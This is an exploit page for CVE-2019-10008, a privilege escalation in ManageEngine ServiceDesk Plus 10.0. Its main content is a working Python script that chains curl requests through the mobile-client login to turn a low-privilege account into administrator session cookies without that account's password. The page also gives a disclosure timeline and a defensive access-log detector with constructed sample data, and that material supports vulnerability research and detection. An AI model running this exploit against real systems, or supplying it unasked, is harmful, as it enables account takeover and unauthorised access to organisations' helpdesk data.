ManageEngine ServiceDesk Plus 10.0 Privilege Escalation (CVE-2019-10008)

Authenticated privilege escalation through the mobile client (/mc/) login: a user holding any valid low-privilege account obtains a working session for an arbitrary other account (including administrator) without knowing its password. Affects ServiceDesk Plus 10.0 before build 10017, which contains the vendor fix.

#!/usr/bin/python
# Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation
# Date: 30-03-2019
# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
# Vendor: ManageEngine
# Vendor Homepage: www.manageengine.com
# Product: Service Desk Plus
# Version: 10.0
# Tested On: Kali Linux
# CVE: CVE-2019-10008
# Platform: JSP
# Timeline
# 22 march 2019: Discovery
# 24 march 2019: CVE id reserved for CVE-2019-10008
# 26 march 2019: First contact with vendor
# 5 april 2019: First publication
# 10 april 2019: Vendor confirmation
# 11 april 2019: Vendor released a fix (version 10017)
# Reference link: https://www.manageengine.com/products/service-desk/readme.html

import os
import re

# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
# Low username and password is an account you have access to. high_username is the account you want to authenticate as.
# After running the script, it will output the cookies that you can set in your browser to log in as high_username without a password.
#
# The script drives curl through /bin/bash (the $'...' arguments are bash ANSI-C quoting) and scrapes
# Set-Cookie headers from the raw responses with regular expressions. It assumes the low-privilege login
# response sets at least two cookies besides JSESSIONID, JSESSIONIDSSO and _rem; those are replayed unchanged.

#Host ip address + port
host="localhost:8080"
#set to https if needed
url = "http://" + host
#Username with credentials you have
low_username="guest"
low_password="guest"
#username you want to login as
high_username="administrator"

print("\033[1;37mUrl: \033[1;32m" + url)
print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)

print("\033[1;32mGetting a session id\033[1;37m")
# Get index page to capture a session id
curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close' \
    $'"+url+"/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print("Sessid:")
print(sessid)

print("\033[1;31mLogging in with low privilege user\033[1;37m")
#Attempt login post request
curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/' \
    -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
    -b $'JSESSIONID="+sessid+"' \
    --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
    $'"+url+"/j_security_check'"
out = os.popen('/bin/bash -c "' + curl+'"').read()

#Instead of following redirects with -L, following manually because we don't need all the transactions.
curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/' \
    -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
    -b $'JSESSIONID="+sessid+"' \
    $'"+url+"/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print(sessid)
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
print(sessidsso)
# Collect every other cookie the authenticated response set; they are replayed on all later requests.
grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
grbl2 = []
for cookie in grbl:
    cl = cookie.split('=')
    if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
        grbl2.append(cl[0])
        grbl2.append(cl[1])

# Enter the mobile client (/mc/) with the low-privilege session; it issues its own JSESSIONID.
curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print("\033[1;32mCaptured secondary sessid.\033[1;37m")
print(sessid2)

print("\033[1;31mDoing the magic step 1.\033[1;37m")
# Log out of the mobile client while still presenting both session ids and the SSO cookie.
curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/mc/WOListView.do' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/jsp/MCLogOut.jsp'"
out = os.popen('/bin/bash -c "' + curl+'"').read()

print("\033[1;31mDoing the magic step 2.\033[1;37m")
# Reload the mobile dashboard to obtain fresh JSESSIONID and JSESSIONIDSSO values.
curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/jsp/MCDashboard.jsp'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]

curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]

# Re-authenticate through the mobile client's j_security_check as the target user. The password
# value is arbitrary ("bypassingpass"); the server accepts it because of the prepared session state.
# (The published script passed only the bare host value here; it is sent as a proper Host header.)
curl = "curl -i -s -k -X $'POST' \
    -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
    $'"+url+"/mc/j_security_check'"
out = os.popen('/bin/bash -c "' + curl+'"').read()

# The dashboard now issues session cookies bound to high_username.
curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -H $'Upgrade-Insecure-Requests: 1' \
    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/jsp/MCDashboard.jsp'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]

print("\033[1;31mCaptured target session. Set the following cookies in your browser.\033[1;37m")
print("JSESSIONID=" + sessidhigh)
print("JSESSIONIDSSO=" + sessidssohigh)
print(grbl2[0] + "=" + grbl2[1])
print(grbl2[2] + "=" + grbl2[3])
print("_rem=true")
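A triage check for defenders, added here as an illustration; it is not part of the exploit above and not ManageEngine's code. It scans the front end's access log for the request order the script produces from a single client address (a web-UI login to /j_security_check, entry to /mc/, the mobile-client logout MCLogOut.jsp, then a second login through /mc/j_security_check) within a short window. The Tomcat/Apache "common" log layout, the 30-second window and the sample lines are assumptions constructed for the example. An access log records neither j_username nor whether the password was accepted, and a genuine user who logs out of the mobile client and back in produces the same path sequence, so a hit is a lead to confirm in the application's own login audit, where the actual signal is a different account authenticating from the same client right after the low-privilege login.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: the front end writes a Tomcat/Apache "common" style access log.
# Adjust LOG_RE and TS_FMT if your deployment logs a different layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Ordered subsequence the exploit produces from one client address: web-UI login,
# entry to the mobile client, its logout page, then the mobile-client login POST.
SEQUENCE = [
    ("POST", "/j_security_check"),
    ("GET", "/mc/"),
    ("GET", "/mc/jsp/MCLogOut.jsp"),
    ("POST", "/mc/j_security_check"),
]

# Constructed sample data, not taken from any real system: 10.0.0.5 replays the
# exploit flow, 10.0.0.9 is an ordinary mobile-client login without the prelude.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Apr/2019:10:00:01 +0000] "GET / HTTP/1.1" 200 5120
10.0.0.5 - - [05/Apr/2019:10:00:02 +0000] "POST /j_security_check HTTP/1.1" 302 0
10.0.0.5 - - [05/Apr/2019:10:00:03 +0000] "GET / HTTP/1.1" 200 8310
10.0.0.5 - - [05/Apr/2019:10:00:04 +0000] "GET /mc/ HTTP/1.1" 302 0
10.0.0.5 - - [05/Apr/2019:10:00:05 +0000] "GET /mc/jsp/MCLogOut.jsp HTTP/1.1" 200 412
10.0.0.5 - - [05/Apr/2019:10:00:06 +0000] "GET /mc/jsp/MCDashboard.jsp HTTP/1.1" 200 2201
10.0.0.5 - - [05/Apr/2019:10:00:07 +0000] "POST /mc/j_security_check HTTP/1.1" 302 0
10.0.0.5 - - [05/Apr/2019:10:00:08 +0000] "GET /mc/jsp/MCDashboard.jsp HTTP/1.1" 200 9870
10.0.0.9 - - [05/Apr/2019:10:01:00 +0000] "GET /mc/ HTTP/1.1" 200 1200
10.0.0.9 - - [05/Apr/2019:10:01:03 +0000] "POST /mc/j_security_check HTTP/1.1" 302 0
10.0.0.9 - - [05/Apr/2019:10:01:04 +0000] "GET /mc/jsp/MCDashboard.jsp HTTP/1.1" 200 9870
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]  # compare paths without query strings
    return rec


def find_mc_reauth(lines, window=timedelta(seconds=30)):
    """Return (ip, first_ts, last_ts) for every client address whose requests contain
    SEQUENCE in order with the whole run inside `window`. Unrelated requests may be
    interleaved; a new web-UI login restarts the matcher for that address."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    hits = []
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        idx, first_ts = 0, None
        for rec in recs:
            key = (rec["method"], rec["path"])
            if key == SEQUENCE[0]:
                idx, first_ts = 1, rec["ts"]
                continue
            if idx == 0:
                continue
            if rec["ts"] - first_ts > window:
                idx, first_ts = 0, None
                continue
            if key == SEQUENCE[idx]:
                idx += 1
                if idx == len(SEQUENCE):
                    hits.append((ip, first_ts, rec["ts"]))
                    idx, first_ts = 0, None
    return hits


if __name__ == "__main__":
    for ip, start, end in find_mc_reauth(SAMPLE_LOG.splitlines()):
        print("%s: mobile-client re-login sequence %s -> %s; "
              "confirm the second j_username in the application login audit" % (ip, start, end))
```

Run it against a real log with `find_mc_reauth(open(path).readlines())`; on the sample it reports only 10.0.0.5, because 10.0.0.9 never performed the web-UI login and mobile-client logout that precede the second j_security_check POST.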
